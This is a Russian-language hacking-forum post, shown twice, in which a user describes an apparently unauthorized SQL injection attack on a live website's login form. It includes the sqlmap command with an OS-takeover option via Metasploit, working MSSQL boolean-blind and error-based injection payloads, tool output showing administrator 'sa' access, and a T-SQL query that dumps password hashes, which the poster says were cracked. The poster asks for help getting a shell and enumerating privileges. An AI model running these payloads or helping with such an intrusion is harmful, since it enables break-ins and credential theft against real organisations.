mssql

hackworld · 26.05.2019, 20:51

Добрый день прошу совета может кто сталкивался

Есть рес в sqlmap добрался до хешей рассшифровал пробовал лить шелл через метасплоит но выдает unable to prompt for an out-of-band session bug report

sqlmap -u "http://******/" --data="password=g00dPa%24%24w0rD&username=" -p username --os-pwn --msf-path C:\PentestBox\bin\metasploit-framework -v 1

Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: password=g00dPa$$w0rD&username=-5537' OR 9211=9211-- VoeH

Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
Payload: password=g00dPa$$w0rD&username=-5326' OR 1910 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+ (SELECT (CASE WHEN (1910=1910) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(120)+CHAR (113)))-- fjCa
---
[19:51:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016
web application technology: ASP.NET, Microsoft IIS 10.0, ASP
back-end DBMS: Microsoft SQL Server 2012
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[19:51:56] [CRITICAL] unable to prompt for an out-of-band session

banner:
---
Microsoft SQL Server 2014 (SP2-GDR) (KB4019093) - 12.0.5207.0 (X64)
Jul 3 2017 02:25:44
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor)

current user: 'sa'
current database: 'PW_PROD'
current user is DBA: True

На mysql знаю команда --users --passwords --privileges выводит юзеров,пароль и привилегии

в mssql вывел юзеров и пароли такой командой

select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins

--is-dba пишет True

команда --privileges выводит просто всех юзеров

database management system users privileges:[*] ##MS_AgentSigningCertificate##[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicySigningCertificate##[*] ##MS_PolicyTsqlExecutionLogin##[*] ##MS_SmoExtendedSigningCertificate##[*] ##MS_SQLAuthenticatorCertificate##[*] ##MS_SQLReplicationSigningCertificate##[*] ##MS_SQLResourceSigningCertificate##[*] bwuser[*] sa (administrator)

как посмотреть какие конкретные привилегии есть у юзеров?

26.05.2019, 20:51	#1
hackworld Регистрация: 12.09.2018 Сообщений: 3 Репутация: 0	mssql Добрый день прошу совета может кто сталкивался Есть рес в sqlmap добрался до хешей рассшифровал пробовал лить шелл через метасплоит но выдает unable to prompt for an out-of-band session bug report sqlmap -u "http://*****/" --data="password=g00dPa%24%24w0rD&username=" -p username --os-pwn --msf-path C:\PentestBox\bin\metasploit-framework -v 1 Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: password=g00dPa$$w0rD&username=-5537' OR 9211=9211-- VoeH Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) Payload: password=g00dPa$$w0rD&username=-5326' OR 1910 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+ (SELECT (CASE WHEN (1910=1910) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(120)+CHAR (113)))-- fjCa --- [19:51:53] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 10 or 2016 web application technology: ASP.NET, Microsoft IIS 10.0, ASP back-end DBMS: Microsoft SQL Server 2012 how do you want to establish the tunnel? [1] TCP: Metasploit Framework (default) [2] ICMP: icmpsh - ICMP tunneling > 1 [19:51:56] [CRITICAL] unable to prompt for an out-of-band session banner: --- Microsoft SQL Server 2014 (SP2-GDR) (KB4019093) - 12.0.5207.0 (X64) Jul 3 2017 02:25:44 Copyright (c) Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor) current user: 'sa' current database: 'PW_PROD' current user is DBA: True На mysql знаю команда --users --passwords --privileges выводит юзеров,пароль и привилегии в mssql вывел юзеров и пароли такой командой select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins --is-dba пишет True команда --privileges выводит просто всех юзеров database management system users privileges:[] ##MS_AgentSigningCertificate##[] ##MS_PolicyEventProcessingLogin##[] ##MS_PolicySigningCertificate##[] ##MS_PolicyTsqlExecutionLogin##[] ##MS_SmoExtendedSigningCertificate##[] ##MS_SQLAuthenticatorCertificate##[] ##MS_SQLReplicationSigningCertificate##[] ##MS_SQLResourceSigningCertificate##[] bwuser[*] sa (administrator) как посмотреть какие конкретные привилегии есть у юзеров?

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид